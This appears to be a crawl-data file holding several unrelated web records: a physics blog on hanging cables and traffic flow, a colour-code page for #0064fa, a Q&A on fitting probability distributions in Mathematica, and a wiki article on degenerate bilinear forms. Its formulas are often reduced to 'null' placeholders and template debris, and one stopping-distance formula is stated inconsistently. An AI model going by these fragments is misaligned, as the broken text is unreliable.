below.\n\nOff-hand, to determine the distance between the poles if the lowest point of the cable is 20 metres off the ground, I would have used a", null, "$y = a \\cosh(x/L) + b$ because I remembered the mathetamical form of a hanging cable.  However, balancing the horizontal tension in the middle of the cable and gravity in the length of the cable with the force between the pole and cable (and assuming no elastic effect changing the length of the cable) allows you to equate", null, "$a$ and", null, "$L$ in the equation above.  The same result can probably be gotten by looking at an infinitesmal element of cable, but the former approach is mathematically easier.", null, "$b$ depends on", null, "$a$ because", null, "$a + b = 20$.  We know that half the length of the cable is 40 metres so (using the equation for the length of a curve and skipping a few steps)", null, "$40 = \\int_0^d \\sqrt{1+(dy/dx)^2}dx= a \\sinh(d/a)$ where", null, "$d$ is half the distance between the poles. The final equation is", null, "$a \\cosh(d/a) + (20-a) = 50$.  Hyperbolic functions have quadratic relations between them, so taking the appropriate root (positive one) should give half the separation distance being", null, "$d = \\ln\\left( 120/35 + \\sqrt{120^2/35^2+1} \\right) \\approx 22.7$ (metres)\n\nNext, I’ll address the easy problem, which requires little math; if the cable is 80 m long, but the height of the drop is 40 metres, that means that the poles must be side by side (i.e., the cable is folded in half), otherwise the cable cannot drop down that far.\n\n# A popular article on teaching math\n\nI would need more time to write a more thorough review, but keep in mind that it’s written for a general audience (possibly with over-simplifications). That being said, some of the things proposed (like multiple approaches and being conscious of not skipping steps) are things I also think are improtant to take into account.\n\n# Traffic thought experiment\n\nOften when I am walking/driving, I like looking at details of my surroundings. I like looking at waves on the St Lawrence River and I definitely want to try to explain the wave patterns better. My M.Sc. supervisor might have some papers to help understand that better (examples or just a link), which I will hopefully get to in the not-too-distant future. One thing that really bothers a lot of people is a traffic jam. I had some thoughts on this topic and am getting around to writing about it. I will try tailoring this post to address a wide audience.  There should be a follow-up article exploring some more mathematical details.\n\nThere are quite a few papers (including some work by an academic “great-uncle” (PhD supervisor’s postdoctoral co-supervisor) of mine, Nigel Goldenfeld) studying traffic and the origins of traffic jams. Do traffic jams occur as an intrinsic part of the system (cars interacting with each other on a network of roads)? Or is it because of individual behaviours which give rise to these problems? You might think the latter is more reasonable, but in certain cases very different behaviours of the constituent parts (how drivers drive their vehicles) can result in the same behaviour of the system (traffic jams), if some very general rules are followed.", null, "A “typical” car is 4 metres long (in the diagram", null, "$L = 4m$). To estimate", null, "$D$ in the diagram, let us consider it in terms of how far the cars need to be to safely stop. Say a person needs about 2 seconds to react to what is in front of them (this might be an estimate for anticipated stopping time on the highway). I will deviate from that guess (which might be explored in the follow-up post) and instead look at breaking up the estimate as follows:", null, "$D = \\Delta t_r v + \\frac{a}{2} v^2$\n\nWe can take the reaction time,", null, "$\\Delta t_r$, to be about a half second, so the distance covered is", null, "$\\Delta t_r v$. Assuming constant deceleration for intense breaking (say", null, "$5 m/s^2$ for reference), the time taken is", null, "$t = v/a$ and the distance covered while stopping is", null, "$d = v^2/(2a)$.\n\nThe least space a single car takes up when trying to be safe is about:", null, "$L +D = L + v^2/(2a)+ v \\Delta t_r$\n\nCorrespondingly, the maximum density of cars is reciprocal of the above relation so:", null, "$\\rho = \\frac{1}{4 + v^2/(2a)+ v \\Delta t_r}$\n\nTaking", null, "$a = 5 m/s^2$ and", null, "$Delta t_r = 0.5 s$ with v in", null, "$m/s$, we get this relation between car density (in cars per m) and speed:\n\nor in tabular form (where Rho is the density in cars per metre and v is the speed in metres per second):\nrho v\n0 0.250000 0.0\n1 0.217391 1.0\n2 0.185185 2.0\n3 0.156250 3.0\n4 0.131579 4.0\n5 0.111111 5.0\n6 0.094340 6.0\n7 0.080645 7.0\n8 0.069444 8.0\n9 0.060241 9.0\n10 0.052632 10.0\n\nA car takes up effectively less space at lower speeds when trying to be safe according to this model, so highways being slowed down to surrounding roads at high traffic density (many cars on a single road at the same time) is intuitive.  Let us extend this by looking at the flow rate of cars,", null, "$\\Phi$, which is the velocity times the density:", null, "$\\Phi = v \\rho = \\frac{v}{4 + v^2/(2a)+ v /2}$\n\nLooking at some integer values, there’s a peak around 6 m/sec:\n\nphi (cars/sec) v (m/sec)\n0 0.000000 0.0\n1 0.370370 2.0\n2 0.526316 4.0\n3 0.566038 6.0\n4 0.555556 8.0\n5 0.526316 10.0\n6 0.491803 12.0\n7 0.457516 14.0\n8 0.425532 16.0\n9 0.396476 18.0\n10 0.370370 20.0\n\n(Note that this is not exact, but I’m using this method to illustrate that although rigor and exactness in calculations and quantitative methods is nice and often important, in a lot of cases, rigor and exactness are difficult to obtain because of too many unknowns.  In such cases, resorting to something simple to get a sense of what is being studied can help.)\n\nExperimenting with different parameters, I often got peak flow rates around 5-10 m/sec which is 18-36 km/h or 10-20 mph. With the current parameters, a peak occurring at a little over 20 km/h suggests. (On a side note, I am wondering if this gives some intuition into one factor as to what suitable speed limits should be — at typical traffic levels, what is a safe speed on that road?) Interestingly, there is a conflict between how fast an individual travels through a region and how all vehicles do.  On a nearly empty road, you can choose to drive however fast you want (being mindful of the speed limit).  Eventually as the density of cars increases, the speed at which they can safely travel decreases.  This results in the maximum flow of cars on the road (the number of car passing a fixed decreasing).  This corresponds with the intuition that traffic jams occur at high traffic volumes but not at low ones (unless there’s construction).\n\nThe above reasoning is qualitative, but can help some one analysing a problem with giving them an intuition. In a future post, let’s see how this model performs under perturbations. Done, the next analysis will be appropriate for an upper year undergraduate student (though younger students with the appropriate calculus skills should be able to follow the arguments as well). That being said, be cautious of this particular model because it was only conceived in a thought experiment and was highly idealized (nothing was even considered about network effects — because real traffic happens in a “grid” of multi-lane roads with various signage affecting the traffic flow).  When doing mathematics, that approach can be sufficient, but not when engaging in empirical empirical discipline like the natural sciences (e.g., physics, chemistry, biology) or social sciences (e.g., economics or politics)." ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://jonathanstolle.files.wordpress.com/2019/12/traffic_blog.png", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93693805,"math_prob":0.9401943,"size":12499,"snap":"2020-34-2020-40","text_gpt3_token_len":2874,"char_repetition_ratio":0.10132053,"word_repetition_ratio":0.014783527,"special_character_ratio":0.22665814,"punctuation_ratio":0.11391375,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9797755,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-28T04:20:30Z\",\"WARC-Record-ID\":\"<urn:uuid:5a9ffdb6-9c17-4cd5-9502-177efeff1dac>\",\"Content-Length\":\"96102\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cf2185da-fe3d-4e00-8fa5-53d799c9b547>\",\"WARC-Concurrent-To\":\"<urn:uuid:1347062f-ebe0-43e3-b0f1-03445d5fc4fc>\",\"WARC-IP-Address\":\"192.0.78.12\",\"WARC-Target-URI\":\"https://jonathanstolle.wordpress.com/\",\"WARC-Payload-Digest\":\"sha1:7G2BJ65U3EYRT6B7URGIP2QZQUXETJQ6\",\"WARC-Block-Digest\":\"sha1:ZATEVDOSCDCGKOPEMPC2GI7OH52RKDCV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401585213.82_warc_CC-MAIN-20200928041630-20200928071630-00433.warc.gz\"}"}
https://www.colorhexa.com/0064fa
[ "# #0064fa Color Information\n\nIn a RGB color space, hex #0064fa is composed of 0% red, 39.2% green and 98% blue. Whereas in a CMYK color space, it is composed of 100% cyan, 60% magenta, 0% yellow and 2% black. It has a hue angle of 216 degrees, a saturation of 100% and a lightness of 49%. #0064fa color hex could be obtained by blending #00c8ff with #0000f5. Closest websafe color is: #0066ff.\n\n• R 0\n• G 39\n• B 98\nRGB color chart\n• C 100\n• M 60\n• Y 0\n• K 2\nCMYK color chart\n\n#0064fa color description : Pure (or mostly pure) blue.\n\n# #0064fa Color Conversion\n\nThe hexadecimal color #0064fa has RGB values of R:0, G:100, B:250 and CMYK values of C:1, M:0.6, Y:0, K:0.02. Its decimal value is 25850.\n\nHex triplet RGB Decimal 0064fa `#0064fa` 0, 100, 250 `rgb(0,100,250)` 0, 39.2, 98 `rgb(0%,39.2%,98%)` 100, 60, 0, 2 216°, 100, 49 `hsl(216,100%,49%)` 216°, 100, 98 0066ff `#0066ff`\nCIE-LAB 46.994, 34.579, -80.727 21.809, 16.015, 92.379 0.167, 0.123, 16.015 46.994, 87.821, 293.188 46.994, -22.019, -122.802 40.018, 27.246, -108.854 00000000, 01100100, 11111010\n\n# Color Schemes with #0064fa\n\n• #0064fa\n``#0064fa` `rgb(0,100,250)``\n• #fa9600\n``#fa9600` `rgb(250,150,0)``\nComplementary Color\n• #00e1fa\n``#00e1fa` `rgb(0,225,250)``\n• #0064fa\n``#0064fa` `rgb(0,100,250)``\n• #1900fa\n``#1900fa` `rgb(25,0,250)``\nAnalogous Color\n• #e1fa00\n``#e1fa00` `rgb(225,250,0)``\n• #0064fa\n``#0064fa` `rgb(0,100,250)``\n• #fa1900\n``#fa1900` `rgb(250,25,0)``\nSplit Complementary Color\n• #64fa00\n``#64fa00` `rgb(100,250,0)``\n• #0064fa\n``#0064fa` `rgb(0,100,250)``\n• #fa0064\n``#fa0064` `rgb(250,0,100)``\n• #00fa96\n``#00fa96` `rgb(0,250,150)``\n• #0064fa\n``#0064fa` `rgb(0,100,250)``\n• #fa0064\n``#fa0064` `rgb(250,0,100)``\n• #fa9600\n``#fa9600` `rgb(250,150,0)``\n• #0045ae\n``#0045ae` `rgb(0,69,174)``\n• #0050c7\n``#0050c7` `rgb(0,80,199)``\n• #005ae1\n``#005ae1` `rgb(0,90,225)``\n• #0064fa\n``#0064fa` `rgb(0,100,250)``\n• #1572ff\n``#1572ff` `rgb(21,114,255)``\n• #2e82ff\n``#2e82ff` `rgb(46,130,255)``\n• #4891ff\n``#4891ff` `rgb(72,145,255)``\nMonochromatic Color\n\n# Alternatives to #0064fa\n\nBelow, you can see some colors close to #0064fa. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #00a3fa\n``#00a3fa` `rgb(0,163,250)``\n• #008efa\n``#008efa` `rgb(0,142,250)``\n• #0079fa\n``#0079fa` `rgb(0,121,250)``\n• #0064fa\n``#0064fa` `rgb(0,100,250)``\n• #004ffa\n``#004ffa` `rgb(0,79,250)``\n• #003afa\n``#003afa` `rgb(0,58,250)``\n• #0026fa\n``#0026fa` `rgb(0,38,250)``\nSimilar Colors\n\n# #0064fa Preview\n\nThis text has a font color of #0064fa.\n\n``<span style=\"color:#0064fa;\">Text here</span>``\n#0064fa background color\n\nThis paragraph has a background color of #0064fa.\n\n``<p style=\"background-color:#0064fa;\">Content here</p>``\n#0064fa border color\n\nThis element has a border color of #0064fa.\n\n``<div style=\"border:1px solid #0064fa;\">Content here</div>``\nCSS codes\n``.text {color:#0064fa;}``\n``.background {background-color:#0064fa;}``\n``.border {border:1px solid #0064fa;}``\n\n# Shades and Tints of #0064fa\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #00060f is the darkest color, while #fafcff is the lightest one.\n\n• #00060f\n``#00060f` `rgb(0,6,15)``\n• #000e22\n``#000e22` `rgb(0,14,34)``\n• #001636\n``#001636` `rgb(0,22,54)``\n• #001d49\n``#001d49` `rgb(0,29,73)``\n• #00255d\n``#00255d` `rgb(0,37,93)``\n• #002d71\n``#002d71` `rgb(0,45,113)``\n• #003584\n``#003584` `rgb(0,53,132)``\n• #003d98\n``#003d98` `rgb(0,61,152)``\n• #0045ac\n``#0045ac` `rgb(0,69,172)``\n• #004cbf\n``#004cbf` `rgb(0,76,191)``\n• #0054d3\n``#0054d3` `rgb(0,84,211)``\n• #005ce6\n``#005ce6` `rgb(0,92,230)``\n• #0064fa\n``#0064fa` `rgb(0,100,250)``\n• #0f6fff\n``#0f6fff` `rgb(15,111,255)``\n• #227bff\n``#227bff` `rgb(34,123,255)``\n• #3686ff\n``#3686ff` `rgb(54,134,255)``\n• #4992ff\n``#4992ff` `rgb(73,146,255)``\n• #5d9eff\n``#5d9eff` `rgb(93,158,255)``\n• #71aaff\n``#71aaff` `rgb(113,170,255)``\n• #84b5ff\n``#84b5ff` `rgb(132,181,255)``\n• #98c1ff\n``#98c1ff` `rgb(152,193,255)``\n• #accdff\n``#accdff` `rgb(172,205,255)``\n• #bfd9ff\n``#bfd9ff` `rgb(191,217,255)``\n• #d3e4ff\n``#d3e4ff` `rgb(211,228,255)``\n• #e6f0ff\n``#e6f0ff` `rgb(230,240,255)``\n• #fafcff\n``#fafcff` `rgb(250,252,255)``\nTint Color Variation\n\n# Tones of #0064fa\n\nA tone is produced by adding gray to any pure hue. In this case, #737b87 is the less saturated color, while #0064fa is the most saturated one.\n\n• #737b87\n``#737b87` `rgb(115,123,135)``\n• #6a7990\n``#6a7990` `rgb(106,121,144)``\n• #60779a\n``#60779a` `rgb(96,119,154)``\n• #5775a3\n``#5775a3` `rgb(87,117,163)``\n``#4d73ad` `rgb(77,115,173)``\n• #4371b7\n``#4371b7` `rgb(67,113,183)``\n• #3a70c0\n``#3a70c0` `rgb(58,112,192)``\n• #306eca\n``#306eca` `rgb(48,110,202)``\n• #266cd4\n``#266cd4` `rgb(38,108,212)``\n``#1d6add` `rgb(29,106,221)``\n• #1368e7\n``#1368e7` `rgb(19,104,231)``\n• #0a66f0\n``#0a66f0` `rgb(10,102,240)``\n• #0064fa\n``#0064fa` `rgb(0,100,250)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #0064fa is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5107997,"math_prob":0.8712829,"size":3668,"snap":"2022-05-2022-21","text_gpt3_token_len":1610,"char_repetition_ratio":0.14765283,"word_repetition_ratio":0.0073664826,"special_character_ratio":0.5479826,"punctuation_ratio":0.22389792,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98838997,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-28T14:25:50Z\",\"WARC-Record-ID\":\"<urn:uuid:d780c28d-61be-4b26-97b4-9f5f34b093f7>\",\"Content-Length\":\"36124\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0ece8825-9b64-48cf-9f45-41f8d92b9787>\",\"WARC-Concurrent-To\":\"<urn:uuid:2d4d0c2a-79df-4052-8bb4-c0aeb465935c>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/0064fa\",\"WARC-Payload-Digest\":\"sha1:MZDUJBL5KNLN3S64YPXYZYIK53EVL2CC\",\"WARC-Block-Digest\":\"sha1:4S3HR6MO4CZA7JCI65VXM74KOEPLUBDX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652663016853.88_warc_CC-MAIN-20220528123744-20220528153744-00435.warc.gz\"}"}
https://mathematica.stackexchange.com/questions/152849/non-linear-fit-find-distribution-parameters-for-large-gradient-data
[ "# Non linear fit/Find distribution parameters for large gradient data;\n\nsearching around I've found that this is a common problem with fitting but I haven't found a work-able solution.\n\nI have a symmetric data set that I've manipulated so that it is a probability distribution, ie. integral sums to 1, but the peak occurs between -0.002 and 0.002. Using FindDistributionParameters returns an error but I can fit it with a normal distribution using:\n\ndata = ToExpression@ImportString[Import[\"https://pastebin.com/raw/cVExSjYq\"], \"Text\"]\n\n{\\[Mu], \\[Sigma]} = (NonlinearModelFit[\ndata,\n1/Sqrt[2*\\[Pi]*\\[Sigma]^2]*E^(-(x - \\[Mu])^2/(\n2*\\[Sigma]^2)), {\\[Mu], \\[Sigma]}, x][\n\"BestFitParameters\"][[All, 2]]) /. {x_, y_} -> {x, Abs[y]}\n\n\noutputs:\n\n{1.24156*10^-20, 0.000250996}\n\n\nThe distribution doesn't closely match, hence I'm trying to use other distributions but fitting it with\n\nFindDistributionParameters[data,StudentTDistribution[0, \\[Sigma], \\[Nu]], {{\\[Sigma], 0.00025}, {\\[Nu], 0.5}}]\n\n\nreturns the error:\n\n\"One or more data points are not in support of the process or distribution StudentTDistribution[0,\\[Sigma],\\[Nu]].\"\n\n\nI get the same error using WeibullDistribution too and trying to manually find the NonlinearModelFit just returns {1,1,1} for {alpha,beta,mu}.\n\nI've tried removing zero values using Select[data,#[]!=0&] but that doesn't help.\n\nPlotted data with StudentT[0,0.00025,0.5] in blue and NormalDistribution[0,0.00025] in red is shown here:", null, "Any recommendations?\n\n• What are you trying to do with the obtained fit? – Anton Antonov Aug 2 '17 at 0:45\n• @AntonAntonov I'm trying to get a reasonable comparison metric for various trials that are returning similar distributions. I also want to generate a RandomVariate[] to see how a virtual data set responds some other analysis. – Andrew Stewart Aug 2 '17 at 19:09\n• How sure are you that the distribution/function is defined at x=0? Or that it's continuously differentiable? It looks to me to have the form Abs[a x^-b], or something similar, ie: undefined at x=0. Maybe a GammaDistribution (flipped over the vertical axis)? – aardvark2012 Aug 3 '17 at 1:16\n• Part of your manipulations seems to have made the manipulated data perfectly symmetric. Was that on purpose? Was the data duplicated by reflecting it around zero? – JimB Aug 3 '17 at 2:34\n• @aardvark2012 Yes the problem set is defined at 0 and should be continuously differentiable. This data set here was created by mirroring about x=0, but since it is finite at x=0 I didn't find ExponentialDistribution[] or something similar returning appropriate values. I'm not extremely well versed in statistics but I'll take a look at the GammaDistribution. Thanks! – Andrew Stewart Aug 3 '17 at 18:43\n\nThis, too, is an extended comment (and maybe just an repeat of @aardvark2012's and @AntonAntonov's comments).\n\nThe data set you present is a relative frequency distribution (and the actual sample size is lost). The integral doesn't sum to 1 as there is no integral to sum or integrate. What you do have is 0.0001*Total[data[[All,2]]] equaling 1.0.\n\nUsing \"least squares\" to fit a probability distribution is usually not a recommended approach as it usually makes no sense to do so. One of the many reasons is that the error variance is not constant: the tail areas that drop to zero would have to have very small error variances and that is not one of the assumptions in the least squares fitting process you've used.\n\n(Note that for any real values of μ and positive real values of σ the integral Integrate[E^(-(x - μ)^2/(2*σ^2))/Sqrt[2*π*σ^2],{x,-∞,∞} will always equal 1.)\n\nIn short, you are mixing up regression and fitting probability distributions.\n\nYou have a regression situation if you want to predict the data[[All,2]] values from the data[[All,1]] values and believe that the curve form is the same as a probability density function. This, however, does not impart any probabilistic properties to the fit.\n\nIf the raw data consists of a random sample from some probability distribution, then you are better off to use that raw data either with FindDistributionParameters if you really know the form of the probability density function. If you don't know the form and have a large enough sample size, then using SmoothKernelDistribution should be considered.\n\n• Thanks for the response. Yes, the data I presented is heavily modified from what was measured. I have the original frequency histogram but it has irregular intervals, (corrected using a method from Scott & Scott, 2008) but I wasn't able to run that dataset through FindDistributionParameters either. Returned similar error. I'll have to read up on why the least squares is inappropriate. I don't really follow the error variance issue. I'll keep reading. Thanks! – Andrew Stewart Aug 2 '17 at 19:14\n• Here is a link to the Scott & Scott article. One really needs the original data which gets you the associated sample size. – JimB Aug 3 '17 at 2:04\n• the original sample size for this set of data is about 12500 samples. I'm not an expert in stats but I've read enough to know that many of the fit tests break down with >5000 samples. I would put up the file but it gets awkward working with files this large. Does this change anything of great significance? – Andrew Stewart Aug 3 '17 at 18:49\n\nNot an answer, but an extended comment.\n\nThe first point I'd make is that the data slot in FindDistributionParameters is not the same as in NonlinearModelFit -- it's just a list of outcomes, not 2D points (which explains the error message).\n\nSecond, there are a lot of data points lying on the x-axis. And all of them carry the same weight as the few that give the distribution its shape. This may distort the results returned by NonlinearModelFit.\n\nThird, your data is very spikey, and I don't think either of the models you've tried are, by themselves, spikey enough to get a good fit.\n\nHere's a slightly modified version of the StudentTDistribution:\n\nmodel[x_, \\[Alpha]_, \\[Sigma]_, \\[Nu]_] := \\[Alpha] (\\[Nu]/(\\[Nu] +\nx^2/\\[Sigma]^2))^((1 + \\[Nu])/2)/(\nSqrt[\\[Nu]] \\[Sigma] Beta[\\[Nu]/2, 1/2])\n\nManipulate[\nShow[ListPlot[data],\nPlot[model[x, \\[Alpha], \\[Sigma], \\[Nu]], {x, -0.003, 0.003}, PlotRange -> All],\nPlotRange -> {{-0.003, 0.003}, {0, 2000}}],\n{{\\[Alpha], 1.36201}, 10^-5, 3}, {{\\[Sigma], 0.000149}, 10^-5, 0.0005},\n{{\\[Nu], 0.284}, 10^-5, 1}\n]", null, "Unfortunately, FindFit and NonlinearModelFit both seem pretty unhelpful using this model, even with these initial values for the parameters.\n\nI'll try something else if I get a chance.\n\n• Thanks. I'll take a look and try and quickly scheme something to quantify the closeness. After reading @JimBaldwin's comment though not sure I'm on the right line of thinking. I'll keep reading. Thanks! – Andrew Stewart Aug 2 '17 at 19:08" ]
[ null, "https://i.stack.imgur.com/Byh6t.png", null, "https://i.stack.imgur.com/AVKd0.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8151523,"math_prob":0.9063305,"size":1637,"snap":"2019-51-2020-05","text_gpt3_token_len":483,"char_repetition_ratio":0.12982242,"word_repetition_ratio":0.0,"special_character_ratio":0.31704336,"punctuation_ratio":0.19195047,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9896632,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-18T04:30:05Z\",\"WARC-Record-ID\":\"<urn:uuid:595dd709-d573-40b6-a8e3-22ad3d32fbb5>\",\"Content-Length\":\"158521\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:48fd0bda-a130-49e9-a742-82e63393c039>\",\"WARC-Concurrent-To\":\"<urn:uuid:ac79ba17-f532-4e15-9905-9453199bf305>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://mathematica.stackexchange.com/questions/152849/non-linear-fit-find-distribution-parameters-for-large-gradient-data\",\"WARC-Payload-Digest\":\"sha1:KIXG5RDPTN7QTO364DN37KBU2DDU7BDY\",\"WARC-Block-Digest\":\"sha1:JAOVT2ZCBETNF3LHU7KUQFHE4EZNG4FC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250591763.20_warc_CC-MAIN-20200118023429-20200118051429-00100.warc.gz\"}"}
https://en.formulasearchengine.com/wiki/Degenerate_form
[ "# Degenerate form\n\n{{ safesubst:#invoke:Unsubst||$N=Unreferenced |date=__DATE__ |$B= {{#invoke:Message box|ambox}} }} {{#invoke:Hatnote|hatnote}} In mathematics, specifically linear algebra, a degenerate bilinear form ƒ(x,y) on a vector space V is one such that the map from $V$", null, "to $V^{*}$", null, "(the dual space of $V$", null, ") given by $v\\mapsto (x\\mapsto f(x,v))$", null, "is not an isomorphism. An equivalent definition when V is finite-dimensional is that it has a non-trivial kernel: there exist some non-zero x in V such that\n\n$f(x,y)=0\\,$", null, "for all $y\\in V.$", null, "## Non-degenerate forms\n\nA nondegenerate or nonsingular form is one that is not degenerate, meaning that $v\\mapsto (x\\mapsto f(x,v))$", null, "is an isomorphism, or equivalently in finite dimensions, if and only if\n\n$f(x,y)=0\\,$", null, "for all $y\\in V$", null, "implies that x = 0.\n\n## Using the determinant\n\nIf V is finite-dimensional then, relative to some basis for V, a bilinear form is degenerate if and only if the determinant of the associated matrix is zero – if and only if the matrix is singular, and accordingly degenerate forms are also called singular forms. Likewise, a nondegenerate form is one for which the associated matrix is non-singular, and accordingly nondegenerate forms are also referred to as non-singular forms. These statements are independent of the chosen basis.\n\n## Related notions\n\nThere is the closely related notion of a unimodular form and a perfect pairing; these agree over fields but not over general rings.\n\n## Examples\n\nThe most important examples of nondegenerate forms are inner products and symplectic forms. Symmetric nondegenerate forms are important generalizations of inner products, in that often all that is required is that the map $V\\to V^{*}$", null, "be an isomorphism, not positivity. For example, a manifold with an inner product structure on its tangent spaces is a Riemannian manifold, while relaxing this to a symmetric nondegenerate form yields a pseudo-Riemannian manifold.\n\n## Infinite dimensions\n\nNote that in an infinite dimensional space, we can have a bilinear form ƒ for which $v\\mapsto (x\\mapsto f(x,v))$", null, "is injective but not surjective. For example, on the space of continuous functions on a closed bounded interval, the form\n\n$f(\\phi ,\\psi )=\\int \\psi (x)\\phi (x)dx$", null, "is not surjective: for instance, the Dirac delta functional is in the dual space but not of the required form. On the other hand, this bilinear form satisfies\n\n$f(\\phi ,\\psi )=0\\,$", null, "for all $\\,\\phi$", null, "implies that $\\psi =0.\\,$", null, "## Terminology\n\nIf ƒ vanishes identically on all vectors it is said to be totally degenerate. Given any bilinear form ƒ on V the set of vectors\n\n$\\{x\\in V\\mid f(x,y)=0{\\mbox{ for all }}y\\in V\\}$", null, "forms a totally degenerate subspace of V. The map ƒ is nondegenerate if and only if this subspace is trivial.\n\nSometimes the words anisotropic, isotropic and totally isotropic are used for nondegenerate, degenerate and totally degenerate respectively, although definitions of these latter words can vary slightly between authors.{{ safesubst:#invoke:Unsubst||$N=Dubious |date=__DATE__ |$B= {{#invoke:Category handler|main}}[dubious ] }}\n\nBeware that a vector $x\\in V$", null, "such that $f(x,x)=0$", null, "is called isotropic for the quadratic form associated with the bilinear form $f$", null, "and the existence of isotropic lines does not imply that the form is degenerate." ]
[ null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null, "https://en.formulasearchengine.com/index.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8855201,"math_prob":0.99626815,"size":2899,"snap":"2020-45-2020-50","text_gpt3_token_len":666,"char_repetition_ratio":0.14818653,"word_repetition_ratio":0.004514673,"special_character_ratio":0.1942049,"punctuation_ratio":0.093023255,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9971798,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-28T14:21:34Z\",\"WARC-Record-ID\":\"<urn:uuid:1de4716d-5e1c-4068-8d5f-9d3f64461202>\",\"Content-Length\":\"77237\",\"Content-Type\":\"application/http; 